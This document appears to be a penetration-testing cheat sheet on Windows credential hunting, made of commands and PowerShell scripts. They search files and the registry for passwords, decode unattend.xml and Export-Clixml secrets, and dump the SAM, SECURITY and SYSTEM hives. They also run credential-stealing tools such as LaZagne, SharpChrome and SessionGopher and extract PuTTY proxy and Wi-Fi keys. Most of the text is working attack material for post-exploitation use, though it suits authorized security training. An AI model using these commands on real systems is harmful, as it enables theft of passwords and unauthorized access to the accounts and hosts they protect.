Credential Hunting


Search for Passwords

findstr /si password *.xml *.ini *.txt
dir /s *pass* == *.config
dir /s *pass* == *cred* == *vnc* == *.config*

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\Users\<USERNAME>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*.vbs -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path "C:\Users\<USERNAME>" -Recurse -Include *.txt,*.xml,*.ini,*.conf -File -ErrorAction SilentlyContinue | Select-String -Pattern "password|passwd|pass|name|login|user|username"

Saved Credentials

cmdkey /list

Run Commands as Another User

If cmdkey lists a saved credential for the target account, runas /savecred picks it up without prompting, so the command runs in that user's context.

runas /savecred /user:inlanefreight\bob "COMMAND HERE"

Application Configuration Files

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

Dictionary Files

Chrome Dictionary Files

gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password

Unattended Installation Files

Unattended installation files may define auto-logon settings or additional accounts to be created as part of the installation. Passwords in unattend.xml are stored either in plaintext or base64 encoded (encoded, not encrypted, so they decode trivially). Check the usual locations:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
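The following is an added example, not code from the original page: it walks the answer-file locations listed above, pulls every Password / AdministratorPassword element, and decodes the base64 ones. It assumes the Windows SIM convention that a value marked PlainText=false is base64 of UTF-16LE(password + "Password"); the suffix is stripped only when present, since a hand-edited file may omit it. The sample answer file, its accounts and passwords are constructed.

```powershell
# Added example: decode credentials from unattend/sysprep answer files.
# Assumption (Windows SIM convention): <PlainText>false</PlainText> means
# base64(UTF-16LE(password + "Password")). A hand-written file may omit the suffix.
function ConvertFrom-UnattendPassword {
    param([string]$Value, [bool]$IsPlainText)
    if ($IsPlainText) { return $Value }
    try {
        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Value))
        if ($decoded.EndsWith('Password')) { $decoded = $decoded.Substring(0, $decoded.Length - 8) }
        return $decoded
    } catch {
        return "<not base64: $Value>"
    }
}

function Get-UnattendCredential {
    param([Parameter(ValueFromPipeline)][string]$Path)
    process {
        if (-not (Test-Path -Path $Path)) { return }
        [xml]$doc = Get-Content -Path $Path -Raw
        # local-name() sidesteps the urn:schemas-microsoft-com:unattend default namespace
        foreach ($node in $doc.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")) {
            $value = $node.SelectSingleNode("*[local-name()='Value']")
            if (-not $value) { continue }
            $plain   = $node.SelectSingleNode("*[local-name()='PlainText']")
            $isPlain = (-not $plain) -or ($plain.InnerText -ne 'false')   # absent PlainText = plaintext
            $parent  = $node.ParentNode
            $user = 'Administrator'                                       # AdministratorPassword has no name element
            if ($node.LocalName -eq 'Password') {
                # AutoLogon uses <Username>, LocalAccount uses <Name>
                $user = $parent.SelectSingleNode("*[local-name()='Username' or local-name()='Name']").InnerText
            }
            [pscustomobject]@{
                File     = $Path
                Section  = $parent.LocalName
                User     = $user
                Password = ConvertFrom-UnattendPassword -Value $value.InnerText -IsPlainText $isPlain
            }
        }
    }
}

# Constructed sample answer file (not from any real host), dropped in %TEMP%
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Winter2024!' + 'Password'))
$sample = @"
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>$encoded</Value><PlainText>false</PlainText></Password>
        <Username>Administrator</Username>
        <Enabled>true</Enabled>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>Spring2024!</Value><PlainText>true</PlainText></Password>
            <Name>svc_deploy</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
"@
$samplePath = Join-Path $env:TEMP 'unattend-sample.xml'
Set-Content -Path $samplePath -Value $sample -Encoding UTF8

# The sample plus the real candidate paths; missing files are skipped silently
@(
    $samplePath,
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep\sysprep.xml'
) | Get-UnattendCredential | Format-Table -AutoSize
```

On the constructed sample this yields Administrator / Winter2024! (decoded from base64) and svc_deploy / Spring2024! (plaintext); on a real host the sample rows are joined by whatever the listed files contain.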

PowerShell History File

Confirming PowerShell History Save Path

Get-History
(Get-PSReadLineOption).HistorySavePath

Reading PowerShell History File

gc (Get-PSReadLineOption).HistorySavePath

We can also use this one-liner to retrieve the contents of all PowerShell history files that we can access as our current user.

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

PowerShell Credentials

PowerShell credentials are often used in scripts and scheduled tasks as a convenient way to store credentials in encrypted form. Export-Clixml protects the SecureString with DPAPI, so the file decrypts only for the user who created it, on the machine where it was created. Any script (or attacker) running as that user on that host can therefore recover the password.

Take, for example, the following script Connect-VC.ps1, which a sysadmin has created to connect to a vCenter server easily.

# Connect-VC.ps1
# One-time setup, run interactively as the account that will later execute the script:
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
# Export-Clixml wraps the SecureString with DPAPI (current user, current host),
# so pass.xml only decrypts for that same user on that same machine.
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
# Connect-VIServer comes from VMware PowerCLI
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

Decrypting PowerShell Credentials

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

PSCredential Object

$password = ConvertTo-SecureString "qwertqwertqwert123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("daveadmin", $password)
Enter-PSSession -ComputerName CLIENTWK220 -Credential $cred
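The following is an added example, not code from the original page or the sysadmin's script. It shows why a credential file made with Export-Clixml is only recoverable as the same user on the same host, and why a script that protects a password with ConvertTo-SecureString -Key instead is recoverable by anyone who can read the script. The account name 'bob_adm', the password and the key are constructed values.

```powershell
# Added example: DPAPI-bound (Export-Clixml) vs key-bound (-Key) SecureStrings.
$plain  = 'Winter2024!'                                       # constructed sample secret
$secure = ConvertTo-SecureString -String $plain -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential('bob_adm', $secure)

# 1. Export-Clixml: the SecureString is wrapped with DPAPI under the current
#    user's master key. The file holds a DPAPI blob (hex string starting with the
#    DPAPI signature 01000000d08c9ddf0115d1118c7a00c04fc297eb), not the password.
$path = Join-Path $env:TEMP 'pass.xml'
$cred | Export-Clixml -Path $path
$blob = ([xml](Get-Content -Path $path -Raw)).SelectSingleNode("//*[local-name()='SS']").InnerText
"DPAPI blob in pass.xml: $($blob.Substring(0, 40))..."

# Same user, same host: decrypts. Any other account, or the file copied to another
# machine, gets "Key not valid for use in specified state" from Import-Clixml.
$fromFile = Import-Clixml -Path $path
"Recovered from pass.xml as this user: $($fromFile.GetNetworkCredential().Password -eq $plain)"

# 2. -Key: AES with a key the script itself has to carry, so the ciphertext
#    travels with its key. Anyone holding the script decrypts it on any host, as any user.
$key      = [byte[]](1..32)                                  # the hardcoded-key pattern seen in automation scripts
$portable = ConvertFrom-SecureString -SecureString $secure -Key $key
"Key-bound string (safe to move, not safe to keep next to its key): $($portable.Substring(0, 40))..."

$restoredSecure = ConvertTo-SecureString -String $portable -Key $key
$restored = New-Object System.Management.Automation.PSCredential('bob_adm', $restoredSecure)
"Recovered from -Key string: $($restored.GetNetworkCredential().Password -eq $plain)"
```

When hunting, the practical distinction is: a DPAPI blob in a .xml file is worth it only if you can execute as the owning user on that host, while a -Key string is worth it the moment you find the key (usually hardcoded a few lines above it in the same script).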

Local Administrator Password Solution (LAPS)

Where LAPS is deployed, the cleartext local administrator password is stored in the ms-Mcs-AdmPwd attribute of the computer object. It is a confidential attribute, returned only to principals granted read access to it (accounts with "All extended rights" on computer objects are the classic misconfiguration), so an empty result means no rights rather than no LAPS.

Get-ADComputer <RHOST> -Properties 'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime'

Search the Registry for Passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Dumping Credentials

Saving the SAM, SECURITY and SYSTEM hives requires local administrator rights (the SYSTEM hive holds the boot key needed to decrypt the other two). The saved files can then be parsed offline, for example with Impacket's secretsdump.py.

reg save hklm\system system
reg save hklm\sam sam
reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

Other files

Manually Searching the File System for Credentials

# Search File Contents for String
cd c:\Users\user\Documents & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

-- PowerShell ----------------------------
select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password

# Search for file extensions
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ *.config

-- PowerShell ----------------------------
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Sticky Notes Passwords

Looking for StickyNotes DB Files

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

This can also be done with PowerShell using the PSSQLite module.

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PSSQLite.psd1

$db = 'C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Internet Information Service (IIS)

Application pools running under a custom service account expose that account's password in the appcmd output (requires administrator rights). Connection strings live in web.config; the machine-level file below is one place to look, but the per-site files under C:\inetpub (or wherever the sites are deployed) are usually the ones that hold them.

appcmd.exe list apppool /text:*
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Other Files of Interest

%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*

Further Credential Theft

Browser Credentials

We can use a tool such as SharpChrome to retrieve cookies and saved logins from Google Chrome.

.\SharpChrome.exe logins /unprotect

Lazagne

When all else fails, we can run the LaZagne tool in an attempt to retrieve credentials from a wide variety of software.

.\lazagne.exe all

SessionGopher

We can use SessionGopher to extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials.

We need local admin access to retrieve stored session information for every user in HKEY_USERS, but it is always worth running as our current user to see if we can find any useful credentials.

Import-Module .\SessionGopher.ps1
Invoke-SessionGopher -Target WINLPE-SRV01

Windows Autologon

Windows Autologon is a feature that allows a user to configure their Windows operating system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup.

The registry values associated with Autologon live under the following key in HKEY_LOCAL_MACHINE, which standard users can read:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

The typical configuration of an Autologon account involves manually setting the following registry values under that key:

  • AutoAdminLogon - Determines whether Autologon is enabled or disabled. A value of "1" means it is enabled.

  • DefaultUserName - Holds the username of the account that will automatically log on (DefaultDomainName holds its domain).

  • DefaultPassword - Holds the cleartext password for that account. If AutoAdminLogon is "1" but this value is missing, the password was most likely set with the Sysinternals Autologon tool, which stores it as the LSA secret DefaultPassword instead; reading that requires SYSTEM.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty

For PuTTY sessions that go through a proxy, saving the session writes the proxy credentials to the registry in clear text (the ProxyUsername and ProxyPassword values). The SSH password itself is never saved; only the HostName and UserName are.

Computer\HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<SESSION NAME>

Enumerating Sessions and Finding Credentials

Session names are URL-encoded in the registry, so a session saved as "kali ssh" appears as kali%20ssh.

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\kali%20ssh
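The following is an added example, not code from the original page or from PuTTY: it enumerates saved sessions, URL-decodes the session names and pulls the fields that carry credentials. The -AllUsers switch walks every hive loaded under HKEY_USERS, which needs local admin; without it only the current user's sessions are read. Value names (HostName, UserName, ProxyMethod, ProxyHost, ProxyUsername, ProxyPassword) are PuTTY's own.

```powershell
# Added example: saved PuTTY sessions with their proxy credentials.
function Get-PuttySessionCredential {
    param([switch]$AllUsers)

    $roots = if ($AllUsers) {
        # Only hives of currently logged-on users are loaded under HKEY_USERS
        Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
            ForEach-Object { "Registry::$($_.Name)\SOFTWARE\SimonTatham\PuTTY\Sessions" }
    } else {
        @('HKCU:\SOFTWARE\SimonTatham\PuTTY\Sessions')
    }

    foreach ($root in $roots) {
        if (-not (Test-Path -Path $root)) { continue }
        # Owner is the SID under HKEY_USERS, or the current user for HKCU
        $owner = if ($root -like 'Registry::HKEY_USERS\*') { ($root -split '\\')[1] } else { $env:USERNAME }

        foreach ($session in (Get-ChildItem -Path $root)) {
            $p = Get-ItemProperty -Path $session.PSPath
            [pscustomobject]@{
                Owner         = $owner
                Session       = [uri]::UnescapeDataString($session.PSChildName)   # kali%20ssh -> kali ssh
                HostName      = $p.HostName
                UserName      = $p.UserName
                ProxyMethod   = $p.ProxyMethod     # 0 = none; anything else means the Proxy* fields are in use
                ProxyHost     = $p.ProxyHost
                ProxyUsername = $p.ProxyUsername
                ProxyPassword = $p.ProxyPassword
            }
        }
    }
}

# Keep only sessions that actually carry something reusable
Get-PuttySessionCredential | Where-Object { $_.ProxyPassword -or $_.UserName } | Format-Table -AutoSize
```

Run it again with -AllUsers once you hold local admin; users whose hives are not loaded can be covered by loading their NTUSER.DAT with reg load, which is what SessionGopher automates.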

Wifi Passwords

Listing the wireless networks a workstation has connected to works as any user; revealing the stored keys with key=clear requires local admin access.

netsh wlan show profile

Retrieving Saved Wireless Passwords

netsh wlan show profile ilfreight_corp key=clear
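The following is an added example, not code from the original page: it generalizes the two netsh commands above to every saved profile and parses out the authentication type and key. The regexes match the English netsh output (localized builds use other labels), and "Key Content" only appears when running elevated, so as a standard user the Key column stays empty while the profile list is still returned.

```powershell
# Added example: every saved WLAN profile with its authentication type and key.
# Parses netsh output, so it is tied to the English labels shown below.
function Get-WlanProfileKey {
    # Profile list lines look like "    All User Profile     : corp-wifi"
    $names = foreach ($line in (netsh wlan show profiles)) {
        if ($line -match '^\s*(All User|Current User) Profile\s*:\s*(.+?)\s*$') { $Matches[2] }
    }

    foreach ($name in $names) {
        $auth = $null
        $key  = $null
        # key=clear prints "Key Content" only when elevated; 802.1X profiles have no key line at all
        foreach ($line in (netsh wlan show profile name="$name" key=clear)) {
            if (-not $auth -and $line -match '^\s*Authentication\s*:\s*(.+?)\s*$') { $auth = $Matches[1] }
            elseif ($line -match '^\s*Key Content\s*:\s*(.+?)\s*$') { $key = $Matches[1] }
        }
        [pscustomobject]@{ Profile = $name; Authentication = $auth; Key = $key }
    }
}

Get-WlanProfileKey | Format-Table -AutoSize
```

Profiles with an authentication type such as WPA2-Enterprise carry no pre-shared key; their credentials, if any, are the user's domain or certificate credentials and are not exposed here.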
